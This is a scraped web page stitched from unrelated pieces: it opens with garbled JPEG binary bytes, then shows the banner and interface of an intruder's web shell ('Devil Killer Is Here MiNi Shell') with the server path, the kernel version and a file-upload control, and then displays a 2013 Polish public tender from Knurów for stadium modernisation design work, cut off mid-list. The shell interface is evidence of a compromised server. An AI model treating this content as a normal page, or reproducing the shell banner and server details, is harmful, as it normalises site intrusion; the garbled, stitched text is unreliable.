JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/160579-N-2013.html

<p class="kh_header"><b>Knurów: Opracowanie pełno-branżowej dokumentacji projektowo - kosztorysowej modernizacji Stadionu Miejskiego w Knurowie przy ul. Dworcowej 28</b><br>
<b>Numer ogłoszenia: 160579 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , ul. Sztygarska - Hala Sportowa, 44-193 Knurów, woj. śląskie, tel. 032 3304810, faks 032 3304812.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosirknurow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie pełno-branżowej dokumentacji projektowo - kosztorysowej modernizacji Stadionu Miejskiego w Knurowie przy ul. Dworcowej 28.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie pełno-branżowej dokumentacji projektowo - kosztorysowej modernizacji Stadionu Miejskiego w Knurowie przy ul. Dworcowej 28, znajdującego się na nieruchomościach komunalnych o powierzchniach 2,04 ha oraz 0,59 ha oznaczonych w ewidencji gruntów jako działka nr 2141/20 oraz część działki 2141/22, jedn. rej. G.763-45.
2. Wymagany zakres opracowania:
2.1. Koncepcja funkcjonalno - przestrzenna wraz z szacunkowym kosztem realizacji zadania. Zaakceptowanie koncepcji przez Zamawiającego będzie stanowiło podstawę do przystąpienia do dalszych prac projektowych,
2.2. Opracowanie dokumentacji projektowo - kosztorysowej, w tym:
2.2.1. Projekt budowlany wraz ze wszystkimi niezbędnymi uzgodnieniami, badaniami i opiniami stanowiący podstawę uzyskania pozwolenia na budowę,
2.2.2. Branżowe projekty wykonawcze,
2.2.3. Specyfikacje techniczne wykonania i odbioru robót,
2.2.4. Przedmiary robót,
2.2.5. Kosztorysy inwestorskie i zbiorcze zestawienie kosztów,
2.2.6. Wizualizacja projektu na 3 sztywnych planszach o wymiarach 1,5 x 1,0 m,
2.3. Pełnienie nadzoru autorskiego w czasie realizacji inwestycji.
3. Zamawiający wymaga, aby dokumentacja była opracowana w sposób umożliwiający wykonanie robót w etapach, a projekty poszczególnych etapów były skompletowane w oddzielnych teczkach. Szczegółowy sposób podziału na etapy zostanie określony w trakcie opracowywania i zatwierdzania koncepcji.
4. Dokumentacja projektowa powinna być opracowana zgodnie z:
4.1. Ustawą z dnia 7 lipca 1994r. Prawo budowlane (tekst jednolity Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.), 
4.2. Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r., poz. 462),
4.3. Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. z 2004r. nr 202, poz. 2072 z późn. zm.).
5. Kosztorys winien być opracowany zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389).
6. Proponowane rozwiązania techniczne muszą być zgodne z normami i wytycznym obowiązującym w tym zakresie oraz przepisami prawnym i technicznymi. Rozwiązania techniczne powinny zapewnić niskie koszty budowy i eksploatacji obiektu.
7. Dokumentacja projektowa będzie służyć jako opis przedmiotu zamówienia w procedurze udzielenia zamówienia publicznego w drodze przetargu nieograniczonego na modernizację Stadionu Miejskiego przy ul. Dworcowej 28 w Knurowie. Zamawiający wymaga, aby w dokumentacji projektowej nie występowały nazwy własne producentów oraz dostawców oraz nazwy typów materiałów i urządzeń. Wymagania dotyczące materiałów i urządzeń powinny być tak sformułowane, aby nie utrudniać uczciwej konkurencji (art. 29 ust. 2 pzp), tj. aby nie wskazywać na dostawcę lub producenta, nie można też przywoływać instrukcji konkretnego producenta, chyba że jest to uzasadnione specyfiką zamówienia. W takim przypadku podając nazwy własne producentów oraz dostawców oraz nazwy typów materiałów i urządzeń należy dodać zapis lub równoważny (art. 29  ust. 3 pzp).
8. Zakres rzeczowy dokumentacji: 
8.1. Zakładana docelowa ilość miejsc siedzących dla kibiców - minimum 3000 (słownie: trzy tysiące). Planowana ilość miejsc siedzących dla kibiców po realizacji I etapu 950 (słownie: dziewięćset pięćdziesiąt), w tym 50 miejsc w wydzielonym sektorze dla kibiców drużyny przyjezdnej. 
8.2. Boisko piłkarskie: 
8.2.1. Rozbiórka starego ogrodzenia wraz z rozbiórką budynków kasowych, budynku WC, wieży z zegarem boiskowym; ogrodzenia wokół boiska piłkarskiego;
8.2.2. Rozbiórka starego zadaszenia wraz z konstrukcją nad widownią od strony południowo - zachodniej;
8.2.3. Likwidacja istniejących słupów oświetleniowych;
8.2.4. Demontaż starych siedzisk na widowni od strony południowo - zachodniej;
8.2.5. Rekonstrukcja i remont wylewek betonowych widowni z wykonaniem schodów i ciągów komunikacyjnych na widowni od strony południowo - zachodniej;
8.2.6. Montaż siedzisk na widowni (900 krzesełek) od strony południowo - zachodniej;
8.2.7. Montaż zadaszenia nad miejscami siedzącymi;
8.2.8. Budowa budynku (postawienie kontenera) przeznaczonego na stanowisko komentatora;
8.2.9. Wykonanie nowych WC dla kibiców;
8.2.10. Wykonanie nowego ogrodzenia wokół Stadionu wraz z bramami, furtkami i bramkami obrotowymi oraz kontenerami kasowymi zintegrowanymi z pomieszczeniami przeznaczonymi na bufet i depozyty od kibiców (szafki depozytowe)
8.2.11. Wykonanie nowego ogrodzenia wokół boiska piłkarskiego wraz z wyjściami ewakuacyjnymi, bramami, furtkami i ciągami komunikacyjnymi wokół boiska dla pieszych, sprzętu technicznego oraz zabezpieczającego,
8.2.12. Wykonanie piłkochwytów;
8.2.13. Wykonanie wiat stadionowych dla zawodników rezerwowych;
8.2.14. Montaż rur ochronnych do rozprowadzenia kabli do oświetlenia, instalacji nagłośnienia, tablicy świetlnej wyników monitoringu;
8.2.15. Montaż oświetlenia z instalacją, fundamentami pod maszty oświetleniowe oraz masztów oświetleniowych, instalacji nagłośnienia, tablicy świetlnej wyników i monitoringu;
8.2.16. Demontaż istniejącej murawy;
8.2.17. Budowa drenażu pod boiskiem odprowadzającego wodę deszczową i wpięcie się z drenażem do kanalizacji deszczowej;
8.2.18. Budowa instalacji nawadniania dla płyty boiska piłkarskiego;
8.2.19. Wykonanie boiska do piłki nożnej z trawy naturalnej o wymiarach pola gry 68 m x 105 m wraz ze strefą ochronną (74 m x 121 m) z opcjonalnym wykorzystaniem zdemontowanej murawy, lub w przypadku braku takiej możliwości położenie murawy z naturalnej trawy - sianej lub z rolki
8.2.20. Demontaż widowni od strony północno - wschodniej - ulicy Dworcowej;
8.2.21. Zabezpieczenie (skucie betonowej widowni, wyrównanie i zabezpieczenie trybuny ziemnej) od strony ulicy Dworcowej;
8.2.22. Remont sektora dla kibiców drużyny przyjezdnej (50 krzesełek) z zachowanym dojściem od ulicy Dworcowej;
8.2.23. Zaprojektowanie widowni wzdłuż całego boiska tak, aby w przyszłości, w kolejnych etapach, była możliwość zwiększenia ilości miejsc siedzących na widowni wraz z niezbędną infrastrukturą (wyjściami ewakuacyjnymi, bramami, furtkami i ciągami komunikacyjnymi wokół boiska dla pieszych, sprzętu technicznego oraz zabezpieczającego, WC, itp.); 
8.2.24. Wycinka drzew (topoli) od strony południowo - zachodniej (pomiędzy nasypem widowni i ogrodzeniem kopalni;
8.3. Budynek socjalny: 
8.3.1. Wykonanie izolacji fundamentów budynku;
8.3.2. Ocieplenie budynku (ściany i dach);
8.3.3. Likwidacja kotłowni węglowej i zaprojektowanie nowej, ekologicznej kotłowni (gaz) z instalacją elektryczną i sterującą;
8.3.4. Wykonanie nowej instalacji centralnego ogrzewania wraz z węzłem c.w.u;
8.3.5. Instalacja kolektorów słonecznych (c.w.u.);
8.3.6. Wymiana instalacji elektrycznej i wodno - kanalizacyjnej w części niewyremontowanej budynku;
8.3.7. Drogi wewnętrzne, parkingi dla autobusów, samochodów, motocykli i rowerów oraz ciągi piesze. Parking należy zlokalizować wokół budynku (zapewniając swobodny przejazd) oraz wzdłuż ulicy Wagowej;w części boiska treningowego 
8.3.8. Ogrodzenie terenu wraz z niezbędnymi furtkami i bramami;
8.3.9. Remont i modernizacja istniejących pomieszczeń biurowych, sanitarnych, sali konferencyjnej oraz magazynowych (powiększenie powierzchni magazynowych);
8.3.10. Budynek należy dostosować do potrzeb osób niepełnosprawnych;
8.3.11. Zaprojektowanie oświetlenia terenu;
8.3.12. Instalacja i sieć teletechniczna wewnątrz obiektu z połączeniem zewnętrznym;
8.3.13. Instalacja monitoringu.
9. Przy projektowaniu należy uwzględnić możliwość korzystania z obiektu przez osoby niepełnosprawne. Całość prac musi uwzględniać etapowość wykonania robót budowlanych. Cała inwestycja powinna zostać podzielona na 5 etapów.
10. Opracowując projekt budowlany należy uzyskać, w oparciu o aktualne wyliczenia zapotrzebowania na media (woda, ścieki, gaz, energia elektryczna, zrzut  deszczówki) nowe warunki przyłączenia.
11. Wykonawca jest zobowiązany do uzyskania wszelkich niezbędnych materiałów (w szczególności zakup i aktualizację mapy do celów projektowych, wypisów z rejestru gruntów itp.) i uzgodnień projektów i warunków technicznych wykonania przyłączy. 
12. Wszystkie rozwiązania w projekcie powinny brać pod uwagę uwarunkowania ekonomiczne, tak aby zrealizować optymalnie funkcjonalny obiekt z zastosowaniem rozwiązań oszczędzających energię. W przypadku nieuzasadnionych zbyt wysokich kosztów realizacji zadania wykazanych w koncepcji w stosunku do kosztów planowanych, Zamawiający może odstąpić od realizacji dalszego zakresu zawartej umowy na opracowanie dokumentacji.
13. Dokumentacja powinna być kompletna z punktu widzenia celu któremu ma służyć, a przede wszystkim posiadać uzgodnienia projektowe między poszczególnymi branżami.
14. Dokumentację należy opracować w ilości egzemplarzy:
14.1. Koncepcja funkcjonalno - przestrzenna wraz z szacunkowym kosztem realizacji zadania:
- 3 egzemplarze (komplety w formie papierowej).
14.2. Projekt budowlany i wykonawczy, w tym technologiczne:
- 6 egzemplarzy (kompletów) w formie papierowej,
- 1 egzemplarz (komplet) w formie papierowej, nie zszyty, który będzie wykorzystywany do kopiowania jako załącznik do SIWZ,
- 1 egzemplarz na nośniku elektronicznym w formacie jpg lub pdf.
14.3. Przedmiary robót:
- 2 egzemplarze (komplety w formie papierowej),
- 1 egzemplarz na nośniku elektronicznym (Word, Excel).
14.4. Kosztorys inwestorski:
- 2 egzemplarze (komplety w formie papierowej),
- 1 egzemplarz na nośniku elektronicznym.
14.5. Specyfikacja techniczna wykonania i odbioru robót:
- 4 egzemplarze (komplety w formie papierowej),
- 1 egzemplarz (komplet) w formie papierowej, nie zszyty, który będzie wykorzystywany do kopiowania jako załącznik do SIWZ
- 1 egzemplarz na nośniku elektronicznym w formacie jpg lub pdf.
15. Szczegółowy zakres zamówienia określa projekt umowy stanowiący załącznik do niniejszej SIWZ. 
16. Wykonawca zobowiązany jest do udzielenia 36-cio miesięcznej gwarancji na wykonane prace projektowe.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający zastrzega sobie możliwość udzielenia zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 pzp realizatorowi zamówienia, zgodnych z przedmiotem zamówienia podstawowego i stanowiących nie więcej niż 20 % jego wartości. 
Zamówienie, o którym mowa powyżej może zostać udzielone nie później niż w okresie 3 lat od udzielenia zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.32.00.00-7, 71.24.50.00-7, 71.42.00.00-8, 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do przetargu winien wnieść wadium w wysokości 1.800,00 zł (słownie: jeden tysiąc osiemset złotych). 
2. Wadium winno być wniesione przed upływem terminu składania ofert.
3. Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 45 ust. 6 pzp.
4. Wadium winno być ważne na cały okres związania ofertą.
5. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Miejskiego Ośrodka Sportu i Rekreacji w Knurowie w GETIN NOBLE Bank S.A., konto nr 62 1560 1081 2121 0978 2266 0004.
6. Wadium wniesione w pieniądzu przechowywane jest na rachunku bankowym.
7. Wadium w pozostałych formach w oryginale należy złożyć w siedzibie Zamawiającego w Sekretariacie - II piętro, pokój nr 206, nie później niż do terminu składania ofert wyznaczonego w niniejszej SIWZ, i nie może ono stanowić załącznika do oferty - z uwagi na konieczność zwrotu dokumentu.
8. Wadium uważa się za wniesione w terminie:
8.1. z chwilą uznania rachunku bankowego zamawiającego przed upływem terminu do składania ofert - w pieniądzu,
8.2. z chwilą złożenia w siedzibie Zamawiającego w Sekretariacie - II piętro, pokój nr 206 przed upływem terminu składania ofert - w pozostałych formach</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga wykazania w wykazie usług doświadczenia w wykonaniu co najmniej 1 (jednej) pracy projektowej w zakresie budowy, przebudowy lub remontu stadionu piłkarskiego wraz z zapleczem, o wartości brutto nie mniejszej niż 50.000,00 zł każda, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 
Zamawiający oceni spełnienie powyższego warunku na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia. 
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował zasobami (wiedzą i doświadczeniem) niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów (wiedzy i doświadczenia) na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający wymaga wskazania w wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia, na stanowiska:
a) Projektanta Nr 1 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania w specjalności architektonicznej,
b) Sprawdzającego Nr 1 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej,
c) Projektanta Nr 2 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania w specjalności konstrukcyjno - budowlanej,
d) Sprawdzającego Nr 2 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno - budowlanej,
e) Projektanta Nr 3 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń:  wodociągowych, kanalizacyjnych, wentylacyjnych, ciepłowniczych,
f) Sprawdzającego Nr 3 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych, kanalizacyjnych, wentylacyjnych, ciepłowniczych,
g) Projektanta Nr 4 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,
h) Sprawdzającego Nr 4 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych,
i) Projektanta Nr 5 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania w specjalności drogowej,
j) Sprawdzającego Nr 5 - co najmniej jednej osoby posiadającej uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej. 
Zamawiający dopuszcza:
1. łączenie funkcji projektanta nr 1, 2, 3, 4 i 5
2. łączenie funkcji sprawdzającego nr 1, 2, 3, 4 i 5
3. łączenie funkcji projektanta i sprawdzającego, ale wyłącznie w różnych branżach;
pod warunkiem posiadania przez jedną osobę stosownych uprawnień w wymaganych powyżej specjalnościach.
W przypadku zaistnienia konieczności prowadzenia prac projektowych w innych branżach Wykonawca zapewni po 2 osoby (projektanta i sprawdzającego) dla każdej z branż, posiadające odpowiednie uprawnienia.
Zamawiający zwraca uwagę, iż zgodnie z wymaganiami art. 12 ust. 7 ustawy - Prawo budowlane podstawę do wykonywania samodzielnych funkcji technicznych w budownictwie stanowi m. in. wpis na listę członków właściwej izby samorządu zawodowego, potwierdzony zaświadczeniem wydanym przez tę izbę, a członkowie izby samorządu zawodowego podlegają obowiązkowemu ubezpieczeniu OC.
Zamawiający oceni spełnienie powyższego warunku na podstawie przedsta­wionych przez Wykonawcę oświadczeń i dokumentów, na zasadzie spełnia - nie spełnia. 
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów, nieza­leżnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu, iż będzie dysponował osobami zdol­nymi do wykonania zamówienia niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dys­pozycji niezbędnych osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamó­wienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

